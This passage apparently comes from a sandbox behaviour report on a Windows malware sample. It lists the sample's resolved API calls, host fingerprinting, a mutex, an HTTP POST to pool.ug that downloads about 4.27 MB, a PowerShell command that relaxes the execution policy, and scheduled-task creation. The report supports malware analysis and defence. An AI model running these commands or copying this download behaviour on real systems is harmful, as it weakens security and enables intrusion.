Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x76c34493 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x76c3179c True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x76c35189 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x76c311f8 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x76c3110c True 4
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x76c314c9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76c3186e True 3
Get Address c:\windows\syswow64\kernel32.dll function = HeapCreate, address_out = 0x76c34a2d True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x771522b0 True 2
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76c4d802 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x76c31809 True 2
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x76c5772f True 2
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x76c310ff True 2
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76c37a10 True 4
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76c31282 True 3
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x76c351b3 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x76c314b1 True 3
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x76c34950 True 2
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x76c35223 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x76c33531 True 1
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x771645f5 True 2
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x76c311e0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x76c33587 True 1
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedIncrement, address_out = 0x76c31400 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x76c311a9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x76c31450 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76c311c0 True 2
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedDecrement, address_out = 0x76c313f0 True 1
Get Address c:\windows\syswow64\advapi32.dll function = RevertToSelf, address_out = 0x74d51562 True 1
Get Address c:\windows\syswow64\advapi32.dll function = QueryServiceLockStatusW, address_out = 0x74da1df1 True 1
Get Address c:\windows\syswow64\advapi32.dll function = QueryServiceConfigA, address_out = 0x74d69a4f True 1
Get Address c:\windows\syswow64\advapi32.dll function = EnumServicesStatusW, address_out = 0x74da2221 True 1
Get Address c:\windows\syswow64\advapi32.dll function = StartServiceW, address_out = 0x74d47974 True 1
Get Address c:\windows\syswow64\advapi32.dll function = ImpersonateSelf, address_out = 0x74d4ae8c True 1
Get Address c:\windows\syswow64\advapi32.dll function = ReportEventA, address_out = 0x74d43ee9 True 1
Get Address c:\windows\syswow64\advapi32.dll function = SetPrivateObjectSecurityEx, address_out = 0x74d83503 True 1
Get Address c:\windows\syswow64\advapi32.dll function = RegEnumKeyW, address_out = 0x74d5445b True 2
Get Address c:\windows\syswow64\gdi32.dll function = SetDeviceGammaRamp, address_out = 0x75b0dd76 True 1
Get Address c:\windows\syswow64\gdi32.dll function = GetEnhMetaFileW, address_out = 0x75aed753 True 1
Get Address c:\windows\syswow64\gdi32.dll function = CreateHalftonePalette, address_out = 0x75aecee2 True 1
Get Address c:\windows\syswow64\gdi32.dll function = CopyMetaFileW, address_out = 0x75af960c True 1
Get Address c:\windows\syswow64\gdi32.dll function = EnumMetaFile, address_out = 0x75af72ea True 1
Get Address c:\windows\syswow64\gdi32.dll function = UnrealizeObject, address_out = 0x75aec9ae True 1
Get Address c:\windows\syswow64\gdi32.dll function = PolyDraw, address_out = 0x75b15d87 True 1
Get Address c:\windows\syswow64\gdi32.dll function = OffsetRgn, address_out = 0x75aeb3d4 True 1
Get Address c:\windows\syswow64\gdi32.dll function = GetFontUnicodeRanges, address_out = 0x75aec95d True 1
Get Address c:\windows\syswow64\gdi32.dll function = GetTextExtentExPointW, address_out = 0x75af6815 True 1
Get Address c:\windows\syswow64\gdi32.dll function = ResetDCW, address_out = 0x75afe2db True 1
Get Address c:\windows\syswow64\gdi32.dll function = SwapBuffers, address_out = 0x75b159fb True 1
Get Address c:\windows\syswow64\gdi32.dll function = CloseFigure, address_out = 0x75b154af True 1
Get Address c:\windows\syswow64\ole32.dll function = CoDosDateTimeToFileTime, address_out = 0x756c78c9 True 1
Get Address c:\windows\syswow64\ole32.dll function = OleSaveToStream, address_out = 0x75644434 True 1
Get Address c:\windows\syswow64\ole32.dll function = OleMetafilePictFromIconAndLabel, address_out = 0x7565f9ba True 1
Get Address c:\windows\syswow64\ole32.dll function = CreateStreamOnHGlobal, address_out = 0x7560363b True 2
Get Address c:\windows\syswow64\ole32.dll function = CoLockObjectExternal, address_out = 0x7566e871 True 1
Get Address c:\windows\syswow64\ole32.dll function = CoRevertToSelf, address_out = 0x755f0065 True 1
Get Address c:\windows\syswow64\ole32.dll function = OleCreateEmbeddingHelper, address_out = 0x75661173 True 1
Get Address c:\windows\syswow64\shell32.dll function = FindExecutableW, address_out = 0x75fd22f9 True 1
Get Address c:\windows\syswow64\shell32.dll function = DuplicateIcon, address_out = 0x761d49ac True 1
Get Address c:\windows\syswow64\shell32.dll function = SHGetPathFromIDListA, address_out = 0x760f1c24 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetDataFromIDListW, address_out = 0x760025db True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ExtractAssociatedIconA, address_out = 0x761d4efe True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = DragQueryFileA, address_out = 0x761e50b1 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = HiliteMenuItem, address_out = 0x74fb850f True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetClipboardViewer, address_out = 0x74fb8111 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetCaretPos, address_out = 0x74f7eef6 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DdeConnectList, address_out = 0x74f9ee95 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SendMessageW, address_out = 0x74f59679 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadKeyboardLayoutA, address_out = 0x74f9bb35 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DialogBoxParamA, address_out = 0x74f9cb0c True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetDialogBaseUnits, address_out = 0x74f78941 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = IsCharAlphaNumericA, address_out = 0x74f66867 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = ToUnicodeEx, address_out = 0x74fb0193 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = EnumWindowStationsW, address_out = 0x74f986b4 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CallMsgFilterW, address_out = 0x74f7d1e8 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = RegisterClipboardFormatA, address_out = 0x74f60afa True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetNextDlgGroupItem, address_out = 0x74fa23a7 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = RegisterClassExA, address_out = 0x74f5db98 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = IsCharAlphaA, address_out = 0x74f78fa0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = ChangeDisplaySettingsW, address_out = 0x74fa08b5 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = ToAscii, address_out = 0x74f99005 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = IsZoomed, address_out = 0x74f63332 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = EnumWindowStationsA, address_out = 0x74f602d6 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CharPrevExA, address_out = 0x74fb4dd7 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefFrameProcA, address_out = 0x74f67fbb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CharNextA, address_out = 0x74f57a1b True 2
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMenuItemInfoW, address_out = 0x74f65b20 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = AnyPopup, address_out = 0x74fb548c True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = WinHelpA, address_out = 0x74f7557f True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMenu, address_out = 0x74f65041 True 1
Fn
Get Address c:\windows\syswow64\winhttp.dll function = WinHttpQueryOption, address_out = 0x7367ec68 True 1
Fn
Get Address c:\windows\syswow64\winhttp.dll function = WinHttpSetCredentials, address_out = 0x736945d7 True 1
Fn
Get Address c:\windows\syswow64\winhttp.dll function = WinHttpCrackUrl, address_out = 0x7367953a True 1
Fn
Get Address c:\windows\syswow64\winspool.drv function = DeviceCapabilitiesA, address_out = 0x735baa78 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77170fcb True 8
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77169d35 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x76c33519 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x76c31b00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSection, address_out = 0x77162c42 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalFree, address_out = 0x76c32d3c True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalAlloc, address_out = 0x76c3168c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersion, address_out = 0x76c34467 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetThreadLocale, address_out = 0x76c335cf True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineA, address_out = 0x76c351a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x76c334c8 True 2
Fn
Get Address c:\windows\syswow64\user32.dll function = GetKeyboardType, address_out = 0x74f99ac4 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxA, address_out = 0x74fafd1e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExA, address_out = 0x74d548ef True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExA, address_out = 0x74d54907 True 2
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x74d5469d True 2
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SysFreeString, address_out = 0x75223e59 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SysReAllocStringLen, address_out = 0x75227810 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SysAllocStringLen, address_out = 0x752245d2 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegEnumKeyA, address_out = 0x74d6a299 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = FreeSid, address_out = 0x74d5412e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x76c3495d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalUnlock, address_out = 0x76c4cfdf True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalLock, address_out = 0x76c4d0a7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemInfo, address_out = 0x76c349ca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileAttributesW, address_out = 0x76c31b18 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x76c354ee True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x76c34435 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x76c34442 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileW, address_out = 0x76c389b3 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryW, address_out = 0x76c34259 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileW, address_out = 0x76c5830d True 2
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SelectObject, address_out = 0x75ae4f70 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = DeleteObject, address_out = 0x75ae5689 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = DeleteDC, address_out = 0x75ae58b3 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = CreateCompatibleDC, address_out = 0x75ae54f4 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = CreateCompatibleBitmap, address_out = 0x75ae5f49 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = BitBlt, address_out = 0x75ae5ea6 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = ReleaseDC, address_out = 0x74f57446 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetSystemMetrics, address_out = 0x74f57d2f True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetDC, address_out = 0x74f572c4 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CharToOemBuffA, address_out = 0x74f6b1b0 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = OleInitialize, address_out = 0x755fefd7 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoCreateInstance, address_out = 0x75629d0b True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x749dc544 True 1
Fn
Get Address c:\windows\syswow64\crypt32.dll function = CryptUnprotectData, address_out = 0x759e5a7f True 1
Fn
Get Address c:\windows\syswow64\crtdll.dll function = wcscmp, address_out = 0x6c25032a True 1
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll function = GdiplusStartup, address_out = 0x72cb5600 True 1
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll function = GdiplusShutdown, address_out = 0x72cb56be True 1
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll function = GdipCreateBitmapFromHBITMAP, address_out = 0x72cc6671 True 1
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll function = GdipGetImageEncodersSize, address_out = 0x72cd2203 True 1
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll function = GdipGetImageEncoders, address_out = 0x72cd228c True 1
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll function = GdipDisposeImage, address_out = 0x72cc4cc8 True 1
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll function = GdipSaveImageToStream, address_out = 0x72cc4153 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = GetHGlobalFromStream, address_out = 0x756041d5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExpandEnvironmentStringsW, address_out = 0x76c34173 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalMemoryStatus, address_out = 0x76c38b6d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x76c33f5c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileSize, address_out = 0x76c3196e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReadFile, address_out = 0x76c33ed3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateMutexA, address_out = 0x76c34c6b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReleaseMutex, address_out = 0x76c3111e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentDirectoryW, address_out = 0x76c35611 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetEnvironmentVariableW, address_out = 0x76c389f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableW, address_out = 0x76c31b48 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetCurrentDirectoryW, address_out = 0x76c41260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalMemoryStatusEx, address_out = 0x76c5d4c4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32FirstW, address_out = 0x76c58baf True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32NextW, address_out = 0x76c5896c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetDllDirectoryW, address_out = 0x76cb004f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocalTime, address_out = 0x76c35aa6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeZoneInformation, address_out = 0x76c3465a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RemoveDirectoryW, address_out = 0x76cb44cf True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalDriveStringsA, address_out = 0x76c3e4dc True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeA, address_out = 0x76c4ef75 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x76c3103d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameW, address_out = 0x74d5157a True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCreateKeyExW, address_out = 0x74d540fe True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExW, address_out = 0x74d546ad True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x74d5468d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = AllocateAndInitializeSid, address_out = 0x74d540e6 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = LookupAccountSidA, address_out = 0x74d81daa True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CreateProcessAsUserW, address_out = 0x74d4c592 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CheckTokenMembership, address_out = 0x74d4df04 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyW, address_out = 0x74d52459 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegEnumValueW, address_out = 0x74d548cc True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptAcquireContextA, address_out = 0x74d491dd True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptCreateHash, address_out = 0x74d4df4e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptHashData, address_out = 0x74d4df36 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGetHashParam, address_out = 0x74d4df7e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptDestroyHash, address_out = 0x74d4df66 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptReleaseContext, address_out = 0x74d4e124 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = EnumDisplayDevicesW, address_out = 0x74f7e567 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = wvsprintfA, address_out = 0x74f6aad3 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetKeyboardLayoutList, address_out = 0x74f62e69 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x75ff1e46 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = RtlComputeCrc32, address_out = 0x771effc1 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenA, address_out = 0x753ff18e True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetConnectA, address_out = 0x753f49e9 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpOpenRequestA, address_out = 0x753f4c7d True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpAddRequestHeadersA, address_out = 0x753edcd2 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpSendRequestA, address_out = 0x754618f8 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetReadFile, address_out = 0x753eb406 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetCloseHandle, address_out = 0x753eab49 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetCrackUrlA, address_out = 0x753dd075 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetSetOptionA, address_out = 0x753e75e8 True 1
Fn
User (3)
Operation Additional Information Success Count
Get Username user_name_out = 5p5NrGJn0jS HALPmcxz True 3
Keyboard (1)
Operation Additional Information Success Count
Get Info type = 0, result_out = 4 True 1
System (258)
Operation Additional Information Success Count
Get Computer Name result_out = XDUWTFONO True 3
Get Time type = System Time, time = 2019-05-13 17:23:02 (UTC) True 1
Get Time type = Ticks, time = 162303 True 1
Get Time type = Performance Ctr, time = 22423470182 True 1
Get Time type = System Time True 249
Get Info type = Operating System True 1
Get Info type = Operating System True 2
Mutex (1)
Operation Additional Information Success Count
Create mutex_name = A6CF1546B-343A2EC6-63D8DC88-FF4A8C5D-82A11F69 True 1
Environment (1)
Operation Additional Information Success Count
Get Environment String - True 1
Network Behavior
HTTP Sessions (1)
Information Value
Total Data Sent 259 bytes
Total Data Received 4.27 MB
Contacted Host Count 1
Contacted Hosts 46.232.113.12
HTTP Session #1
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Server Name pool.ug
Server Port 80
Username -
Password -
Data Sent 259 bytes
Data Received 4.27 MB
Operation Additional Information Success Count
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Open Connection protocol = HTTP, server_name = pool.ug, server_port = 80 True 1
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, target_resource = /1/index.php, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Send HTTP Request url = pool.ug/1/index.php True 1
Read Response size = 65636, size_out = 9406 True 1
Read Response size = 65636, size_out = 3464 True 1
Read Response size = 65636, size_out = 908 True 1
Read Response size = 65636, size_out = 65564 True 1
Read Response size = 65636, size_out = 8816 True 1
Read Response size = 65636, size_out = 3464 True 1
Read Response size = 65636, size_out = 62188 True 1
Read Response size = 65636, size_out = 65588 True 1
Read Response size = 65636, size_out = 1524 True 1
Read Response size = 65636, size_out = 65564 True 3
Read Response size = 65636, size_out = 61440 True 1
Read Response size = 65636, size_out = 65572 True 1
Read Response size = 65636, size_out = 43824 True 1
Read Response size = 65636, size_out = 65564 True 1
Read Response size = 65636, size_out = 45268 True 1
Read Response size = 65636, size_out = 65564 True 1
Read Response size = 65636, size_out = 43808 True 1
Read Response size = 65636, size_out = 3464 True 1
Read Response size = 65636, size_out = 65571 True 1
Read Response size = 65636, size_out = 43312 True 1
Read Response size = 65636, size_out = 65636 True 1
Read Response size = 65636, size_out = 7364 True 1
Read Response size = 65636, size_out = 40880 True 1
Read Response size = 65636, size_out = 65572 True 1
Read Response size = 65636, size_out = 42348 True 1
Read Response size = 65636, size_out = 3472 True 1
Read Response size = 65636, size_out = 908 True 1
Read Response size = 65636, size_out = 65548 True 1
Read Response size = 65636, size_out = 45283 True 1
Read Response size = 65636, size_out = 65636 True 1
Read Response size = 65636, size_out = 46784 True 1
Read Response size = 65636, size_out = 2920 True 2
Read Response size = 65636, size_out = 65636 True 1
Read Response size = 65636, size_out = 45324 True 1
Read Response size = 65636, size_out = 5840 True 1
Read Response size = 65636, size_out = 8760 True 1
Read Response size = 65636, size_out = 65636 True 1
Read Response size = 65636, size_out = 43864 True 1
Read Response size = 65636, size_out = 65636 True 1
Read Response size = 65636, size_out = 54084 True 1
Read Response size = 65636, size_out = 65636 True 1
Read Response size = 65636, size_out = 52615 True 1
Read Response size = 65636, size_out = 2920 True 1
Read Response size = 65636, size_out = 65636 True 1
Read Response size = 65636, size_out = 48244 True 1
Read Response size = 65636, size_out = 2920 True 1
Read Response size = 65636, size_out = 65636 True 1
Read Response size = 65636, size_out = 57004 True 1
Read Response size = 65636, size_out = 52560 True 1
Read Response size = 65636, size_out = 65636 True 1
Read Response size = 65636, size_out = 2984 True 1
Read Response size = 65636, size_out = 3472 True 1
Read Response size = 65636, size_out = 65626 True 1
Read Response size = 65636, size_out = 65636 True 4
Read Response size = 65636, size_out = 40648 True 1
Read Response size = 65636, size_out = 65636 True 1
Read Response size = 65636, size_out = 7364 True 1
Read Response size = 65636, size_out = 65636 True 1
Read Response size = 65636, size_out = 59924 True 1
Read Response size = 65636, size_out = 2920 True 1
Read Response size = 65636, size_out = 49640 True 1
Read Response size = 65636, size_out = 65636 True 1
Read Response size = 65636, size_out = 4444 True 1
Read Response size = 65636, size_out = 58400 True 1
Read Response size = 65636, size_out = 65636 True 3
Read Response size = 65636, size_out = 54212 True 1
Read Response size = 65636, size_out = 8760 True 1
Read Response size = 65636, size_out = 65636 True 1
Read Response size = 65636, size_out = 58464 True 1
Read Response size = 65636, size_out = 65636 True 2
Read Response size = 65636, size_out = 65627 True 1
Read Response size = 65636, size_out = 65636 True 1
Read Response size = 65636, size_out = 7556 True 1
Read Response size = 65636, size_out = 65636 True 1
Read Response size = 65636, size_out = 21964 True 1
Read Response size = 65636, size_out = 65636 True 8
Read Response size = 65636, size_out = 9824 True 1
Read Response size = 65636, size_out = 65636 True 3
Read Response size = 65636, size_out = 35662 True 1
Read Response size = 65636, size_out = 0 True 1
Close Session - True 1
Process #11: powershell.exe
Information Value
ID #11
File Name c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Command Line powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\
Monitor Start Time: 00:01:42, Reason: Child Process
Unmonitor End Time: 00:04:44, Reason: Terminated by Timeout
Monitor Duration 00:03:01
Remark No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0x86c
Parent PID 0x6d0 (c:\users\5p5nrgjn0js halpmcxz\appdata\local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin1.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs 0x868, 0x84C, 0x848, 0x844
Process #12: taskeng.exe
Information Value
ID #12
File Name c:\windows\system32\taskeng.exe
Command Line taskeng.exe {A9833FF7-6F72-4DC6-BD4D-B3A90059795D} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\5p5NrGJn0jS HALPmcxz:Interactive:LUA[1]
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:47, Reason: Created Scheduled Job
